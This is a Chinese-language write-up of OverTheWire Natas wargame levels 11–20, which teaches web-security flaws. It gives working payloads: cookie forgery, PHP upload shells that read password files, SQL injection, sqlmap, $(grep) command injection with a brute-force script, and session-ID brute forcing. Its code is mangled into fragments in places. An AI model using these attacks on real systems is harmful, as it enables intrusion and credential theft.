接上一篇Natas通關指南（1-10） 繼續闖關

OverTheWire 是一個 wargame 網站。其中 Natas 是一個適合學習Web安全基礎的遊戲，在Natas 中，我們需要通過找到網站的漏洞獲得通往下一關的密碼。每一關都有一個網站，類似 http://natasX.natas.labs.overthewire.org，其中X是每一關的編號。每一關都要輸入用戶名（例如，level0的用戶名是natas0）及其密碼才能訪問。所有密碼存儲在 /etc/natas_webpass/中。例如natas1的密碼存儲在文件 /etc/natas_webpass/natas1中，只能由natas0和natas1讀取。

網站：

http://overthewire.org/wargames/natas/

Tips:所用工具：Chrome瀏覽器；Curl；BurpSuite；SQLMap

Level 11-12

Username: natas11

Password: natas11

URL: http://natas11.natas.labs.overthewire.org

首先使用我們之前得到的密碼： U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK登錄natas11，得到一句提示：

1. Cookies are protected with XOR encryption

還有一個可以設置背景顏色的輸入框，輸入16進制的色值，即可設置網頁背景顏色，同樣可以通過點擊 Viewsourcecode查看源碼。關鍵代碼如下:

1. $defaultdata = array(
2. "showpassword"
3. =>
4. "no"
5. ,
6. "bgcolor"
7. =>
8. "#ffffff"
9. );
10. function
11. xor_encrypt($in) {
12. $key =
13. ''
14. ;
15. $text = $in;
16. $outText =
17. ''
18. ;
20. // Iterate through each character
22. for
23. ($i=
24. 0
25. ;$i
26. $outText .= $text[$i] ^ $key[$i % strlen($key)];
27. }
29. return
30. $outText;
31. }
32. function
33. loadData($def) {
35. global
36. $_COOKIE;
37. $mydata = $def;
39. if
40. (array_key_exists(
41. "data"
42. , $_COOKIE)) {
43. $tempdata = json_decode(xor_encrypt(base64_decode($_COOKIE[
44. "data"
45. ])),
46. true
47. );
49. if
50. (is_array($tempdata) && array_key_exists(
51. "showpassword"
52. , $tempdata) && array_key_exists(
53. "bgcolor"
54. , $tempdata)) {
56. if
57. (preg_match(
58. '/^#(?:[a-f\d]{6})$/i'
59. , $tempdata[
60. 'bgcolor'
61. ])) {
62. $mydata[
63. 'showpassword'
64. ] = $tempdata[
65. 'showpassword'
66. ];
67. $mydata[
68. 'bgcolor'
69. ] = $tempdata[
70. 'bgcolor'
71. ];
72. }
73. }
74. }
76. return
77. $mydata;
78. }
79. function
80. saveData($d) {
81. setcookie(
82. "data"
83. , base64_encode(xor_encrypt(json_encode($d))));
84. }
85. $data = loadData($defaultdata);
86. if
87. (array_key_exists(
88. "bgcolor"
89. ,$_REQUEST)) {
91. if
92. (preg_match(
93. '/^#(?:[a-f\d]{6})$/i'
94. , $_REQUEST[
95. 'bgcolor'
96. ])) {
97. $data[
98. 'bgcolor'
99. ] = $_REQUEST[
100. 'bgcolor'
101. ];
102. }
103. }
104. saveData($data);
105. ?>
107. natas11
109. "content"
110. >
112. "background: =$data['bgcolor']?>;"
113. >
114. Cookies
115. are
116. protected
118. with
119. XOR encryption
     
     
121. if
122. ($data[
123. "showpassword"
124. ] ==
125. "yes"
126. ) {
128. print
130. "The password for natas12 is
     "
131. ;
132. }
133. ?>

從代碼可以看出，通過一些列的編碼，包括 base64加密， php異或運算。把用戶輸入的數據編碼進 cookie裡面。通過瀏覽器可以查看到data這個值是： ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw。而 showpassword這個參數決定了我們是否能看到下一關密碼。代碼中有個 censored的 key，這個是 php用來做異或運算加密用到的 key,我們需要先算出這 key值，然後用這個值作為 key進行運算和一些列編碼，計算出新的 cookie傳入，即可得到下一關的密碼。

key值計算：

2. $orig_cookie = base64_decode(
3. 'ClVLIh4ASCsCBE8lAxMacFMZV2hdVVotEhhUJQNVAmhSEV4sFxFeaAw'
4. );
6. function
7. xor_encrypt($in) {
8. $text = $in;
9. $key = json_encode(array(
10. "showpassword"
11. =>
12. "no"
13. ,
14. "bgcolor"
15. =>
16. "#ffffff"
17. ));
18. $out =
19. ''
20. ;
22. for
23. ($i=
24. 0
25. ;$i
26. $out .= $text[$i] ^ $key[$i % strlen($key)];
27. }
29. return
30. $out;
31. }
32. echo xor_encrypt($orig_cookie);
33. ?>

得到的結果是 qw8J

計算新的Cookie:

2. $defaultdata = array(
3. "showpassword"
4. =>
5. "yes"
6. ,
7. "bgcolor"
8. =>
9. "#ffffff"
10. );
11. function
12. xor_encrypt($in) {
13. $key =
14. 'qw8J'
15. ;
16. $text = $in;
17. $out =
18. ''
19. ;
21. // Iterate through each character
23. for
24. ($i=
25. 0
26. ;$i
27. $out .= $text[$i] ^ $key[$i % strlen($key)];
28. }
30. return
31. $out;
32. }
33. function
34. loadData($def) {
35. $mydata = $def;
36. $tempdata = json_decode(xor_encrypt(base64_decode($data)),
37. true
38. );
40. return
41. $mydata;
42. }
43. echo base64_encode(xor_encrypt(json_encode(loadData($defaultdata))))
44. ?>

結果是： ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK，傳入新的Cookie：

1. curl -isu natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK natas11.natas.labs.overthewire.org --cookie
2. "data=ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK"
3. HTTP/
4. 1.1
6. 200
7. OK
8. Date
9. :
10. Mon
11. ,
12. 27
14. Aug
16. 2018
18. 13
19. :
20. 40
21. :
22. 47
23. GMT
24. Server
25. :
26. Apache
27. /
28. 2.4
29. .
30. 10
31. (
32. Debian
33. )
34. Set
35. -
36. Cookie
37. : data=
38. ClVLIh4ASCsCBE8lAxMacFMOXTlTWxooFhRXJh4FGnBTVF4sFxFeLFMK
39. ......
40. Cookies
41. are
42. protected
44. with
45. XOR encryption
    
    
46. The
47. password
48. for
49. natas12
50. is
52. EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3
53. 
    
54. ......

得到密碼。

Level 12-13

Username: natas12

URL: http://natas12.natas.labs.overthewire.org

登錄natas12,可以看到是一個上傳文件功能：

1. Choose a JPEG to upload (max 1KB):

提示可以上傳圖片，最大不超過1kB，點擊 Viewsourcecode查看源碼，關鍵代碼如下：

2. function
3. genRandomString() {
4. $length =
5. 10
6. ;
7. $characters =
8. "0123456789abcdefghijklmnopqrstuvwxyz"
9. ;
10. $string =
11. ""
12. ;
14. for
15. ($p =
16. 0
17. ; $p < $length; $p++) {
18. $string .= $characters[mt_rand(
19. 0
20. , strlen($characters)-
21. 1
22. )];
23. }
25. return
26. $string;
27. }
28. function
29. makeRandomPath($dir, $ext) {
31. do
32. {
33. $path = $dir.
34. "/"
35. .genRandomString().
36. "."
37. .$ext;
38. }
39. while
40. (file_exists($path));
42. return
43. $path;
44. }
45. function
46. makeRandomPathFromFilename($dir, $fn) {
47. $ext = pathinfo($fn, PATHINFO_EXTENSION);
49. return
50. makeRandomPath($dir, $ext);
51. }
52. if
53. (array_key_exists(
54. "filename"
55. , $_POST)) {
56. $target_path = makeRandomPathFromFilename(
57. "upload"
58. , $_POST[
59. "filename"
60. ]);
62. if
63. (filesize($_FILES[
64. 'uploadedfile'
65. ][
66. 'tmp_name'
67. ]) >
68. 1000
69. ) {
70. echo
71. "File is too big"
72. ;
73. }
74. else
75. {
77. if
78. (move_uploaded_file($_FILES[
79. 'uploadedfile'
80. ][
81. 'tmp_name'
82. ], $target_path)) {
83. echo
84. "The file has been uploaded"
85. ;
86. }
87. else
88. {
89. echo
90. "There was an error uploading the file, please try again!"
91. ;
92. }
93. }
94. }
95. else
96. {
97. ?>
98. enctype

    =

    "multipart/form-data"

    action

    =

    "index.php"

    method

    =

    "POST"

    >

    type

    =

    "hidden"

    name

    =

    "MAX_FILE_SIZE"

    value

    =

    "1000"

    />

    Choose a JPEG to upload (max 1KB):

    
    

    name

    =

    "uploadedfile"

    type

    =

    "file"

    />
    

    />

    type

    =

    "submit"

    value

    =

    "Upload File"

    />

通過閱讀代碼，可以發現除了限制文件大小和文件擴展名做了前端限制之外，並沒有檢測文件類型。而且還會返回上傳後的路徑，那我們直接上傳一個 php文件去讀取 natas13的密碼即可。你可以通過 BurpSuite之類的工具修改上傳的 filename後綴即可。

1. ///getpass.php
3. $getpass = file_get_contents(
4. '/etc/natas_webpass/natas13'
5. );
6. echo $getpass;
7. ?>

得到密碼： jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY

Level 13-14

Username: natas13

URL: http://natas13.natas.labs.overthewire.org

頁面和前一關一樣，不過查看源代碼發現這一次限制了文件類型，通過 php的函數 exif_imagetype() 來驗證文件類型，通過查看php的文檔，這個函數通過檢查文件的簽名（第一個字節），從而檢測文件類型。關鍵代碼如下：

1. }
2. else
4. if
5. (! exif_imagetype($_FILES[
6. 'uploadedfile'
7. ][
8. 'tmp_name'
9. ])) {
10. echo
11. "File is not an image"
12. ;
13. }
14. else
15. {
17. if
18. (move_uploaded_file($_FILES[
19. 'uploadedfile'
20. ][
21. 'tmp_name'
22. ], $target_path)) {
23. echo
24. "The file has been uploaded"
25. ;
26. }
27. else
28. {
29. echo
30. "There was an error uploading the file, please try again!"
31. ;
32. }
33. }
34. }
35. else
36. {

那我們只需在上傳的 php文件中加入任意圖片格式文件頭標識即可，比如 GIF98a

1. GIF89a
3. $getpass = file_get_contents(
4. '/etc/natas_webpass/natas14'
5. );
6. echo $getpass;
7. ?>

上傳後訪問返回的路徑，得到密碼： Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1

Level 14-15

Username: natas14

URL: http://natas14.natas.labs.overthewire.org

訪問後，是一個登錄頁面，需要輸入 username和 password，查看代碼，關鍵代碼：

2. if
3. (array_key_exists(
4. "username"
5. , $_REQUEST)) {
6. $link = mysql_connect(
7. 'localhost'
8. ,
9. 'natas14'
10. ,
11. ''
12. );
13. mysql_select_db(
14. 'natas14'
15. , $link);
16. $query =
17. "SELECT * from users where username=""
18. .$_REQUEST[
19. "username"
20. ].
21. "" and password=""
22. .$_REQUEST[
23. "password"
24. ].
25. """
26. ;
28. if
29. (array_key_exists(
30. "debug"
31. , $_GET)) {
32. echo
33. "Executing query: $query
    "
34. ;
35. }
37. if
38. (mysql_num_rows(mysql_query($query, $link)) >
39. 0
40. ) {
41. echo
42. "Successful login! The password for natas15 is
    "
43. ;
44. }
45. else
46. {
47. echo
48. "Access denied!
    "
49. ;
50. }
51. mysql_close($link);
52. }
53. else
54. {
55. ?>

很明顯的 SQL注入漏洞，沒有任何過濾，直接試試萬能密碼： " OR 1=1 #

注入成功，得到密碼： Successfullogin!Thepasswordfornatas15isAwWj0w5cvxrZiONgZ9J5stNVkmxdk39J

Level 15-16

Username: natas15

URL: http://natas15.natas.labs.overthewire.org

頁面需要輸入一個 username，可以點擊 Checkexistence查詢用戶是否存在，關鍵代碼如下：

2. natas15
7. id
8. =
9. "content"
10. >
13. /*
14. CREATE TABLE `users` (
15. `username` varchar(64) DEFAULT NULL,
16. `password` varchar(64) DEFAULT NULL
17. );
18. */
20. if
21. (array_key_exists(
22. "username"
23. , $_REQUEST)) {
24. $link = mysql_connect(
25. 'localhost'
26. ,
27. 'natas15'
28. ,
29. ''
30. );
31. mysql_select_db(
32. 'natas15'
33. , $link);
34. $query =
35. "SELECT * from users where username=""
36. .$_REQUEST[
37. "username"
38. ].
39. """
40. ;
42. if
43. (array_key_exists(
44. "debug"
45. , $_GET)) {
46. echo
47. "Executing query: $query
    "
48. ;
49. }
50. $res = mysql_query($query, $link);
52. if
53. ($res) {
55. if
56. (mysql_num_rows($res) >
57. 0
58. ) {
59. echo
60. "This user exists.
    "
61. ;
62. }
63. else
64. {
65. echo
66. "This user doesn't exist.
    "
67. ;
68. }
69. }
70. else
71. {
72. echo
73. "Error in query.
    "
74. ;
75. }
76. mysql_close($link);
77. }
78. else
79. {
80. ?>

這一關，頁面不會返回SQL結果。但可以通過錯誤提示判斷查詢的結果，所以可以使用SQL盲注，可以使用 LIKE表達式用通配符按個判斷。這裡我們直接用 sqlmap好了。

1. sqlmap -u http:
2. //natas15.natas.labs.overthewire.org/index.php --auth-type=basic --auth-cred=natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J --dbms=mysql --data username=natas16 --level=5 --risk=3 --technique=B --dump --string="This user exists"

或者寫python腳本獲取密碼，得到密碼 WaIHEacj63wnNIBROHeqi3p9t0m5nhmh

Level 16-17

Username: natas16

URL: http://natas16.natas.labs.overthewire.org

這一關和第9關，第10關很像，不過過濾了更多的字符

頁面提示 Forsecurity reasons,we now filter even more on certain characters，頁面功能是 Findwords containing:，需要輸入一些內容，然後搜索，然後會輸出一些內容。關鍵代碼如下：

1. $key =
2. ""
3. ;
4. if
5. (array_key_exists(
6. "needle"
7. , $_REQUEST)) {
8. $key = $_REQUEST[
9. "needle"
10. ];
11. }
12. if
13. ($key !=
14. ""
15. ) {
17. if
18. (preg_match(
19. '/[;|&`\'"]/'
20. ,$key)) {
22. print
24. "Input contains an illegal character!"
25. ;
26. }
27. else
28. {
29. passthru(
30. "grep -i "$key" dictionary.txt"
31. );
32. }
33. }
34. ?>

雖然過濾了很多字符，但是沒有過濾 $和 ()。我們知道PHP裡的 $()即使在引號內也可以使用，所以我們可以構造注入語言 $(grep a/etc/natas_webpass/natas17)，執行的語句是這樣的： passthru("grep -i "$(grep a /etc/natas_webpass/natas17)" dictionary.txt");所有的單詞都被返回了。 我們知道 dictionary.txt中存在字符串，比如說 A，用它與 $(grep)的返回值相加，如果內層返回了結果將檢索出空值，如果返回空值則外層的 grep會返回結果 。

比如說:如 password中首字母為 a，構成

grep-I"$(grep ^a /etc/natas_webpass/natas17)A"dictionary.txt由於內部的 $()命令返回了 a，則使外層命令變為

grep-I"aA"dictionary.txt由於 dictionary中沒有 aA，從而返回空值

而如果內層 $()命令返回空值，外層則能正確檢索到 A，於是返回值，證明首字母不是 a

按照這個原理可以構造出爆破腳本

1. import
2. requests
3. chars =
4. '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
5. exist =
6. ''
7. password =
8. ''
9. target =
10. 'http://natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh*@natas16.natas.labs.overthewire.org/'
11. trueStr =
12. 'Output:\n

    \n

    '
13. for
14. x
15. in
16. chars:
17. r = requests.get(target+
18. '?needle=$(grep '
19. +x+
20. ' /etc/natas_webpass/natas17)Getpass'
21. )
23. if
24. r.content.find(trueStr) != -
25. 1
26. :
27. exist += x
29. print
31. 'Using: '
32. + exist
33. for
34. i
35. in
36. range(
37. 32
38. ):
40. for
41. c
42. in
43. exist:
44. r = requests.get(target+
45. '?needle=$(grep ^'
46. +password+c+
47. ' /etc/natas_webpass/natas17)Getpass'
48. )
50. if
51. r.content.find(trueStr) != -
52. 1
53. :
54. password += c
56. print
58. 'Password: '
59. + password +
60. '*'
61. * int(
62. 32
63. - len(password))
65. break

得到密碼是： 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw

Level 17-18

Username: natas17

URL: http://natas17.natas.labs.overthewire.org

同 natas15，不過沒有錯誤提示，所以可以用基於時間的盲注。

得出的密碼是 xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP

Level 18-19

Username: natas18

URL: http://natas18.natas.labs.overthewire.org

提示： Pleaseloginwithyour admin account to retrieve credentialsfornatas19.

同樣有一個登錄框，可以輸入 username和 password。關鍵代碼如下：

1. $maxid =
2. 640
3. ;
4. // 640 should be enough for everyone
5. function
6. isValidAdminLogin() {
7. /* {{{ */
10. if
11. ($_REQUEST[
12. "username"
13. ] ==
14. "admin"
15. ) {
17. /* This method of authentication appears to be unsafe and has been disabled for now. */
20. //return 1;
21. }
23. return
25. 0
26. ;
27. }
28. /* }}} */
30. function
31. isValidID($id) {
32. /* {{{ */
35. return
36. is_numeric($id);
37. }
38. /* }}} */
40. function
41. createID($user) {
42. /* {{{ */
45. global
46. $maxid;
48. return
49. rand(
50. 1
51. , $maxid);
52. }
53. /* }}} */
55. function
56. debug($msg) {
57. /* {{{ */
60. if
61. (array_key_exists(
62. "debug"
63. , $_GET)) {
65. print
67. "DEBUG: $msg
    "
68. ;
69. }
70. }
71. /* }}} */
73. function
74. my_session_start() {
75. /* {{{ */
78. if
79. (array_key_exists(
80. "PHPSESSID"
81. , $_COOKIE)
82. and
83. isValidID($_COOKIE[
84. "PHPSESSID"
85. ])) {
87. if
88. (!session_start()) {
89. debug(
90. "Session start failed"
91. );
93. return
95. false
96. ;
97. }
98. else
99. {
100. debug(
101. "Session start ok"
102. );
104. if
105. (!array_key_exists(
106. "admin"
107. , $_SESSION)) {
108. debug(
109. "Session was old: admin flag set"
110. );
111. $_SESSION[
112. "admin"
113. ] =
114. 0
115. ;
116. // backwards compatible, secure
117. }
119. return
121. true
122. ;
123. }
124. }
126. return
128. false
129. ;
130. }
131. /* }}} */
133. function
134. print_credentials() {
135. /* {{{ */
138. if
139. ($_SESSION
140. and
141. array_key_exists(
142. "admin"
143. , $_SESSION)
144. and
145. $_SESSION[
146. "admin"
147. ] ==
148. 1
149. ) {
151. print
153. "You are an admin. The credentials for the next level are:
     "
154. ;
156. print
158. "

     Username: natas19\n"

159. ;
161. print
163. "Password: "
164. ;
165. }
166. else
167. {
169. print
171. "You are logged in as a regular user. Login as an admin to retrieve credentials for natas19."
172. ;
173. }
174. }
175. /* }}} */
177. $showform =
178. true
179. ;
180. if
181. (my_session_start()) {
182. print_credentials();
183. $showform =
184. false
185. ;
186. }
187. else
188. {
190. if
191. (array_key_exists(
192. "username"
193. , $_REQUEST) && array_key_exists(
194. "password"
195. , $_REQUEST)) {
196. session_id(createID($_REQUEST[
197. "username"
198. ]));
199. session_start();
200. $_SESSION[
201. "admin"
202. ] = isValidAdminLogin();
203. debug(
204. "New session started"
205. );
206. $showform =
207. false
208. ;
209. print_credentials();
210. }
211. }
212. if
213. ($showform) {
214. ?>

從代碼上來看，沒有連接數據庫，說明不是 sql注入，但是我們注意到有一個變量 maxid，在 createID函數中，接收用戶名請求，並將其分配給 1到 640（$maxid）之間的隨機整數。然後它將其初始化為 session_id。假設 PHPSESSID是來自 session_id的賦值，意味有1個會話ID分配會分配給“admin”。通過瀏覽器請求，我們發現 PHPSESSID的值確實是來自變量 maxid產生的 session_id值。

所以我們只要窮舉 maxid的值就好了。可以用 Burpsuite爆破這個值，然後把它作為 PHPSESSID發送請求，即可得到密碼。密碼為 4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs

如果嫌 Burpsuite太麻煩，用 shell腳本也可輕鬆搞定

1. for
2. i
3. in
5. `seq 640`
7. do
8. echo $i
9. curl -isu natas18:xvKIqDjy4OPv7wCRgDlmj0pFsCsDjhdP http:
10. //natas18.natas.labs.overthewire.org/ --cookie "PHPSESSID=$i" | grep natas19
11. done

Level 19-20

Username: natas19

URL: http://natas19.natas.labs.overthewire.org

提示是這樣的： Thispage uses mostly the same codeasthe previous level,but sessionIDsarenolonger sequential...Pleaseloginwithyour admin account to retrieve credentialsfornatas20.意思就是和上一關一樣，只不過 PHPSESSID不再那麼簡單容易猜到而已。

通過觀察，發現其 PHPSESSID,雖然一長串字符串，如 3237362d61646d696e,通過16進制解碼發現，都是由 3位數字-admin組成的，也就是說後面的 2d61646d696e是不變的。所以我們只需要窮舉 1-640之間的數字然後拼接 -admin做16進制轉換，再帶入 PHPSESSID中進行提交，就能找到那個屬於 admin的 PHPSESSID。最後得到的密碼是 eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF

Level 20-21

Username: natas20

URL: http://natas20.natas.labs.overthewire.org

登錄後，提示： Youare loggedinasa regular user.Loginasan admin to retrieve credentialsfornatas21. 你可以輸入 Yourname，然後點 Changename，不過無論你輸入什麼頁面都沒有任何信息反饋給你。查看源碼，關鍵代碼如下：

2. function
3. debug($msg) {
4. /* {{{ */
7. if
8. (array_key_exists(
9. "debug"
10. , $_GET)) {
12. print
14. "DEBUG: $msg
    "
15. ;
16. }
17. }
18. /* }}} */
20. function
21. print_credentials() {
22. /* {{{ */
25. if
26. ($_SESSION
27. and
28. array_key_exists(
29. "admin"
30. , $_SESSION)
31. and
32. $_SESSION[
33. "admin"
34. ] ==
35. 1
36. ) {
38. print
40. "You are an admin. The credentials for the next level are:
    "
41. ;
43. print
45. "

    Username: natas21\n"

46. ;
48. print
50. "Password: "
51. ;
52. }
53. else
54. {
56. print
58. "You are logged in as a regular user. Login as an admin to retrieve credentials for natas21."
59. ;
60. }
61. }
62. /* }}} */
64. /* we don't need this */
66. function
67. myopen($path, $name) {
69. //debug("MYOPEN $path $name");
71. return
73. true
74. ;
75. }
76. /* we don't need this */
78. function
79. myclose() {
81. //debug("MYCLOSE");
83. return
85. true
86. ;
87. }
88. function
89. myread($sid) {
90. debug(
91. "MYREAD $sid"
92. );
94. if
95. (strspn($sid,
96. "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-"
97. ) != strlen($sid)) {
98. debug(
99. "Invalid SID"
100. );
102. return
104. ""
105. ;
106. }
107. $filename = session_save_path() .
108. "/"
109. .
110. "mysess_"
111. . $sid;
113. if
114. (!file_exists($filename)) {
115. debug(
116. "Session file doesn't exist"
117. );
119. return
121. ""
122. ;
123. }
124. debug(
125. "Reading from "
126. . $filename);
127. $data = file_get_contents($filename);
128. $_SESSION = array();
130. foreach
131. (explode(
132. "\n"
133. , $data)
134. as
135. $line) {
136. debug(
137. "Read [$line]"
138. );
139. $parts = explode(
140. " "
141. , $line,
142. 2
143. );
145. if
146. ($parts[
147. 0
148. ] !=
149. ""
150. ) $_SESSION[$parts[
151. 0
152. ]] = $parts[
153. 1
154. ];
155. }
157. return
158. session_encode();
159. }
160. function
161. mywrite($sid, $data) {
163. // $data contains the serialized version of $_SESSION
165. // but our encoding is better
166. debug(
167. "MYWRITE $sid $data"
168. );
170. // make sure the sid is alnum only!!
172. if
173. (strspn($sid,
174. "1234567890qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM-"
175. ) != strlen($sid)) {
176. debug(
177. "Invalid SID"
178. );
180. return
181. ;
182. }
183. $filename = session_save_path() .
184. "/"
185. .
186. "mysess_"
187. . $sid;
188. $data =
189. ""
190. ;
191. debug(
192. "Saving in "
193. . $filename);
194. ksort($_SESSION);
196. foreach
197. ($_SESSION
198. as
199. $key => $value) {
200. debug(
201. "$key => $value"
202. );
203. $data .=
204. "$key $value\n"
205. ;
206. }
207. file_put_contents($filename, $data);
208. chmod($filename,
209. 0600
210. );
211. }
212. /* we don't need this */
214. function
215. mydestroy($sid) {
217. //debug("MYDESTROY $sid");
219. return
221. true
222. ;
223. }
224. /* we don't need this */
226. function
227. mygarbage($t) {
229. //debug("MYGARBAGE $t");
231. return
233. true
234. ;
235. }
236. session_set_save_handler(
238. "myopen"
239. ,
241. "myclose"
242. ,
244. "myread"
245. ,
247. "mywrite"
248. ,
250. "mydestroy"
251. ,
253. "mygarbage"
254. );
255. session_start();
256. if
257. (array_key_exists(
258. "name"
259. , $_REQUEST)) {
260. $_SESSION[
261. "name"
262. ] = $_REQUEST[
263. "name"
264. ];
265. debug(
266. "Name set to "
267. . $_REQUEST[
268. "name"
269. ]);
270. }
271. print_credentials();
272. $name =
273. ""
274. ;
275. if
276. (array_key_exists(
277. "name"
278. , $_SESSION)) {
279. $name = $_SESSION[
280. "name"
281. ];
282. }
283. ?>

我們來看看每個函數的作用：

debug($msg)表示打開了調試信息，可以通過在URL的末尾添加 /index.php?debug來查看調試消息 $msg。

訪問之後將看到一些提示，類似這樣的：

1. DEBUG: MYWRITE sm2d78a9d3u7r6qq2dn8tl7sf1 name|s:5:"admin";
2. DEBUG: Saving in /var/lib/php5/sessions//mysess_sm2d78a9d3u7r6qq2dn8tl7sf1
3. DEBUG: name => admin

可以看出，登錄之後， $ _SESSION的值被存儲在一個文件中。

重點在 mywrite和 myread這兩個關鍵函數，它們的作用是管理會話狀態。

默認情況下， $ _SESSION中唯一的 key是 name，其值通過 /index.php中的表單提交進行設置。我們可以通過對 name鍵值對進行注入：將 data裡面的值變為： name xxxx \n admin1\n。

對換行符編碼然後提交：

1. http://natas20.natas.labs.overthewire.org/index.php?name=test%0Aadmin%201&debug=1

再次訪問 http://natas20.natas.labs.overthewire.org即可得到密碼

1. You are an admin. The credentials for the next level are:
2. Username: natas21
3. Password: IFekPyrQXftziDEsUr3x21sYuahypdgJ

未完待續......